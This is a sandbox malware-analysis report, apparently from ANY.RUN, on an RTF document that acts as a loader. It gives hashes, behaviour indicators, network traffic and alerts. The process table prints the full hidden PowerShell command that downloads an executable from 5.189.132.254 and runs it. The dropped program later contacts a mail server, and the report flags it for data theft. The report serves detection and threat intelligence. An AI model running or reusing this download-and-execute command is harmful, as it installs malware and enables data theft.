analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | 15359ee49d9cf4beaceb3df5f32d3bdeab4fad5c |
| Full analysis: | https://app.any.run/tasks/b5a3b67e-259f-4981-8ea1-218681c9c693 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | March 31, 2020, 08:24:44 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/rtf |
| File info: | Rich Text Format data, version 1, unknown character set |
| MD5: | 527142E25A8229D1DC910AF23CDB5256 |
| SHA1: | 15359EE49D9CF4BEACEB3DF5F32D3BDEAB4FAD5C |
| SHA256: | A02848EC22BD6CAC61258BF9C83A8FECEB4CA5F3F6B828CC47A2E44A14A34ABF |
| SSDEEP: | 1536:malSTPxyjtHv9YH9lH6o0LKkRVOWbUx9dE6mQgaeeVhMDw5wfL2:ml27aRDAw5wfa |
MALICIOUS
Requests a remote executable file from MS Office
- WINWORD.EXE (PID: 3884)
Executable content was dropped or overwritten
- WINWORD.EXE (PID: 3884)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3884)
Executes PowerShell scripts
- WINWORD.EXE (PID: 3884)
Downloads executable files from IP
- WINWORD.EXE (PID: 3884)
- PowerShell.exe (PID: 3508)
Downloads executable files from the Internet
- PowerShell.exe (PID: 3508)
Application was dropped or rewritten from another process
- chme.exe (PID: 4076)
- chme.exe (PID: 2748)
Writes to a start menu file
- chme.exe (PID: 4076)
Actions looks like stealing of personal data
- chme.exe (PID: 2748)
SUSPICIOUS
Creates files in the program directory
- WINWORD.EXE (PID: 3884)
Creates files in the user directory
- PowerShell.exe (PID: 3508)
- PowerShell.exe (PID: 2464)
- chme.exe (PID: 4076)
Executable content was dropped or overwritten
- PowerShell.exe (PID: 3508)
Application launched itself
- chme.exe (PID: 4076)
Reads Environment values
- chme.exe (PID: 2748)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3884)
Reads Internet Cache Settings
- WINWORD.EXE (PID: 3884)
Creates files in the user directory
- WINWORD.EXE (PID: 3884)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .rtf | | | Rich Text Format (100) |
|---|
Total processes
43
Monitored processes
5
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\15359ee49d9cf4beaceb3df5f32d3bdeab4fad5c.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3508 | PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://5.189.132.254/yUtro.exe','C:\Users\admin\AppData\Roaming\chme.exe');Start-Process 'C:\Users\admin\AppData\Roaming\chme.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 2464 | PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://5.189.132.254/yUtro.exe','C:\Users\admin\AppData\Roaming\chme.exe');Start-Process 'C:\Users\admin\AppData\Roaming\chme.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 4076 | "C:\Users\admin\AppData\Roaming\chme.exe" | C:\Users\admin\AppData\Roaming\chme.exe | PowerShell.exe | |
User: admin Integrity Level: MEDIUM Description: FcelI Exit code: 0 Version: 2.1.1.1 | ||||
| 2748 | "C:\Users\admin\AppData\Roaming\chme.exe" | C:\Users\admin\AppData\Roaming\chme.exe | chme.exe | |
User: admin Integrity Level: MEDIUM Description: FcelI Version: 2.1.1.1 | ||||
Total events
2 167
Read events
1 946
Write events
0
Delete events
0
Modification events
Executable files
2
Suspicious files
4
Text files
4
Unknown types
6
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6AE7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2274E0.png | — | |
MD5:— | SHA256:— | |||
| 3508 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\352GMBBRHV6IOTMGAVSX.temp | — | |
MD5:— | SHA256:— | |||
| 2464 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U2YE19VDPJJJSOQXVUWU.temp | — | |
MD5:— | SHA256:— | |||
| 3884 | WINWORD.EXE | C:\Users\admin\Desktop\~$359ee49d9cf4beaceb3df5f32d3bdeab4fad5c.rtf | pgc | |
MD5:C4B4E092D74062227FF303C7992AA6D9 | SHA256:BE53AE3FD4D71A314433B325B50895CD634B102EA5559042A32F9D73A6E81795 | |||
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:477916EFB88A373723F281B8A9BC2EA4 | SHA256:F8C4753F90B6CCCCFB7FC260ACCB0BA935A8E56898FCB3BBF10845FF3B8EE27B | |||
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\15359ee49d9cf4beaceb3df5f32d3bdeab4fad5c.rtf.LNK | lnk | |
MD5:5FE678DDD2FA71B83A439C59A655F0B9 | SHA256:7AF2B3ABF80DC2C7F8BA61F237AA79F221CE783A6EF7BFDC071DCEAAD0864F1B | |||
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:D6BF6CE7FB586A7BD1D315762BA4DADC | SHA256:26C5BA6F484DF4626997FE9345DEACD81606CDA665FC6EB72531A0F9CBB9A173 | |||
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Abctfhghghghgh£.scT | html | |
MD5:764096EB93263886B5EC28EF83837D63 | SHA256:702B970373303492E4789254E72A78D92A944A840BC71D0B72D5D12EA5158432 | |||
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\yUtro[1].exe | executable | |
MD5:7B6A62D0B81D307A71A025500754ED28 | SHA256:A1F8429D0E0750461E796507148F39535FBF28710D45DD5FC90691235B078271 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3508 | PowerShell.exe | GET | 200 | 5.189.132.254:80 | http://5.189.132.254/yUtro.exe | DE | executable | 426 Kb | suspicious |
3884 | WINWORD.EXE | GET | 200 | 5.189.132.254:80 | http://5.189.132.254/yUtro.exe | DE | executable | 426 Kb | suspicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3508 | PowerShell.exe | 5.189.132.254:80 | — | Contabo GmbH | DE | suspicious |
— | — | 5.189.132.254:80 | — | Contabo GmbH | DE | suspicious |
2748 | chme.exe | 162.241.27.33:587 | mail.novaa-ship.com | CyrusOne LLC | US | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
mail.novaa-ship.com |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3884 | WINWORD.EXE | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
3508 | PowerShell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |